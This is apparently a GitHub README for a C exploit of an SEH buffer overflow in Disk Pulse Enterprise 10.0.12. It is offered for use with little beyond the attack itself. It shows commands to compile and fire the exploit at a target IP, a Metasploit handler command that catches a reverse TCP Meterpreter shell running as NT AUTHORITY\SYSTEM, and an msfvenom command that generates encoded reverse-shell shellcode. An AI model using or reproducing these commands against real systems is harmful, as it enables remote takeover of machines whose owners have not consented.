0x73unflower/Disk-Pulse-Enterprise-10.0.12-SEH-Overflow-Exploit

Disk Pulse Enterprise 10.0.12 SEH Overflow Exploit

Exploit

$ gcc disk-pulse-enterprise-10.0.12.c -o disk-pulse-enterprise-10.0.12
$ ./disk-pulse-enterprise-10.0.12
Disk Pulse Enterprise 10.0.12 SEH Exploit
Usage: IP PORT
$ ./disk-pulse-enterprise-10.0.12 "192.168.0.38" "80"
Connected to 192.168.0.38 on port 80!
Sending payload ... OK!
Bytes delivered ... 6298

Meterpreter

$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <IP>; set LPORT <PORT>; set EXITFUNC seh; clear"
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.43:1337
[*] Sending stage (176198 bytes) to 192.168.0.38
[*] Meterpreter session 5 opened (192.168.0.43:1337 -> 192.168.0.38:50264) at 2024-09-17 12:30:21 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

A side note: for a Meterpreter shell, ensure you generate custom shellcode and update the C source file before compiling.

$ msfvenom -p windows/meterpreter/reverse_tcp LPORT=1337 -e x86/shikata_ga_nai -b '\x00\x02\x09\x0a\x0d\x20' -v shellcode -f c

Enjoy.
